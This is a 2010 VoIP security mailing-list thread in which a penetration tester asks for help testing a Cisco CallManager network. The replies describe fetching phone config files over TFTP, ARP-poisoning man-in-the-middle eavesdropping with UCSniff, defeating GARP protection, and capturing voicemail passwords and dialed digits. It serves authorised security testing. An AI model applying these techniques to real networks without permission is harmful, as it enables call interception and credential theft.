[VOIPSEC] pentesting voip network-please help
satyam tyagi
satyam_tyagi at hotmail.com
Sat Jan 30 01:49:45 CST 2010
http://www.unifysquare.com/resources/UnifySquare%20VLAN%20Security%20Whitepaper%20-%20English.pdf
Hope above helps,
Thanks,Satyam
> Date: Fri, 29 Jan 2010 13:00:46 -0600
> From: jpo at pobox.com
> To: mzcohen2682 at aim.com
> CC: voipsec at voipsa.org
> Subject: Re: [VOIPSEC] pentesting voip network-please help
>
> Ah, an internal VoIP pentest - the fun has begun for you, my friend.
> This is one of the things that we live and breathe for.
>
> So from what I gather: you're in the middle of an internal pentest, you
> don't know the names of the image files, you can't capture RTP, and you
> are connected to the voip vlan, correct?
>
> Let's back up a second and assume nothing, and at the same time suggest
> a few general methods, specific steps:
>
> 1. Why do you want to download the image files? What attack are you
> trying to do here? Unless you can be MitM during the image file
> download or have a Ph.d in reverse engineering software, I'm not sure
> how downloading the image file from your laptop is going to help you.
>
> 2. So you have physical access to the IP Phone. Have you tried using a
> hub first for passive eavesdropping? You can share the connection from
> the wall with your laptop and phone, and completely fingerprint the IP
> Phone downloading it's phone configuration file, and placing sample
> calls. This is one of the first methods, and the safest - it does
> require an external power supply for the IP Phone. The network trace
> file can then be compared against MitM eavesdropping attacks to see what
> you are missing when you use a LAN-based MitM ARP Poisoning attack, to
> simulate what regular VoIP users are capable of doing.
>
> 3. You mention downloading the firmware files via brute force attacks,
> and finding interesting information in them, like passwords. I believe
> the phone configuration is what you are looking for (not the firmware
> image). Can you confirm that the environment uses SIP or Skinny (SCCP)
> line side signaling? Since this is UCM 6.1.3 environment, it's likely
> that this is SCCP since that is the default signaling. You should be
> looking for the SEP CNF xml file. If you know the MAC address of the IP
> phone, it's "SEP<mac>.cnf.xml". SIPDefault is for SIP signaling, which
> will be rare with the Callmanager version you mention, in a default
> installation.
>
> 4. You mention that you tried to capture RTP conversations without
> success and you are connected to the VoIP VLAN. How do you know you are
> connected to the VoIP VLAN? Is your test laptop connected to the PC
> port of the IP Phone or have you connected directly to the wall. What
> is the native VLAN and Voice VLAN? Does your test machine have a valid
> IP address in the voice vlan and how have you verified this? Only then
> can you conduct an eavesdropping attack when QoS is configured. There
> are many VoIP sniffers out there but in my opinion the best is UCSniff
> [1] (I am biased, I am the co-author of this tool). UCSniff is free and
> highly specialized for pentesting in a Cisco VoIP environment, and is
> constantly tested against the latest Cisco Unified IP Phones and
> Callmanager software, simulating the most common Cisco production
> enterprise deployments. Some of the things you need to do:
>
> 1. First verify that you have a valid IP address in the VoIP VLAN, as a
> valid registered IP Phone. Can you ping other IP Phones from the same
> VLAN? Does your laptop have a Voice VLAN sub-interface like eth0.x
> where x is the voice vlan? When you browse the IP Phone settings in the
> LCD, what does the Admin VLAN ID and Operational VLAN ID settings tell you?
> 2. Run UCSniff in targeted user mode, which will only conduct the VoIP
> eavesdropping attack against a single Cisco Unified IP Phone (minimizing
> the risk of service impact against entire VoIP VLAN)
> 3. Run a Wireshark trace in parallel, to see the captured traffic.
> What is the audio codec used? Is the trace similar to step 2, with the
> passive traffic trace? Do you receive all SCCP signaling to and from
> the Phone? Do you receive all RTP media stream traffic to or from the
> phone?
> 4. If you are actually doing a MitM arp poisoning attack against the
> network and aren't receiving all traffic to or from the phone, it could
> be an issue with GARP Disabled setting on the IP Phone. UCSniff has a
> feature to change the configuration of the Cisco IP Phone and also
> defeat GARP Disabled with a race condition unicast ARP reply flooding.
> See the UCSniff documentation and website for more information.
> 5. Some of the other VoIP vulnerability demonstrations you can show
> your customer: download /theft of VoIP corporate directory (ucsniff
> does) for targeted eavesdropping based on corporate directory, UC
> keystroke logger (theft of Cisco Unity voice mail passwords, or any
> dialed digits, i.e., banking IVR application)
> 6. There are also other media insertion and replay attacks that you can
> do. Please take a look at the VOIPSA tools list [2], some of the VoIP
> Hacking Exposed [3] tools, and the free VAST [4] Linux Distro, a VoIP
> pentest OS which contains a lot of the VoIP Security tools (including
> UCSniff) already pre-installed.
>
> There are many, many layers deep to the methods and specific steps, but
> this is an initial starting point. Send any more information to this
> list, and we will do our best to help. You can also send me an email
> off-list directly to jostrom at viperlab.net with any specific data, pcap
> traces, or SEP cnf xml files, and I will help.
>
> [1] UCSniff Video / VoIP Sniffer:
> http://ucsniff.sf.net
>
> [2] VOIPSA Tools list:
> http://www.voipsa.org/Resources/tools.php
>
> [3] VoIP Hacking Exposed tools
> http://www.hackingvoip.com/
>
> [4] VIPER VAST Linux Distro
> http://vipervast.sf.net
>
>
>
> mzcohen2682 at aim.com wrote:
> > hi all !!
> >
> > im doing an internal (lan) pentest for a voip network. the network has 6 cisco call manager version 6.1.3 as a cluster. they have cisco phones 7911 and 7941. they use a seperate vlan por the voip network.
> >
> > I started by trying to download the images files for the phones from the tftp server by doing a brute force attack for the names of the files.
> >
> > I have access to one of the 7941 phones so I checked that the verion of the image is 4.0/8.0 (9.0)
> > in not sure what should be the names for the file images that the phones reload after boot but according to cisco documentation there must be SIPdefault.cnf and OS79xx.txt on the root directory of the tftp server. but I tried and there are not..
> >
> > so what are the nemes of the files? I read a documents that said that if im am able to download those files I will find lots of interseting information like phone passwords etc..
> >
> > after that... I tried to capture some RTP conversations but without any success. I am connected to the voip vlan and used wireshark but It doesnt detect any calles ! shoud I do some arp spoofing attack? but to which mac's?
> >
> > any other ideas how to continue with this pentest?
> >
> > what I see is that although the client didnt implement encryption or any other security control just the vlan isnt not so eaxy to pentest a voip network..
> >
> > thanks
> >
> > marco
> >
> >
> >
> >
> > _______________________________________________
> > Voipsec mailing list
> > Voipsec at voipsa.org
> > http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
> >
> >
>
>
> _______________________________________________
> Voipsec mailing list
> Voipsec at voipsa.org
> http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
_________________________________________________________________
Hotmail: Powerful Free email with security by Microsoft.
http://clk.atdmt.com/GBL/go/196390710/direct/01/
More information about the Voipsec
mailing list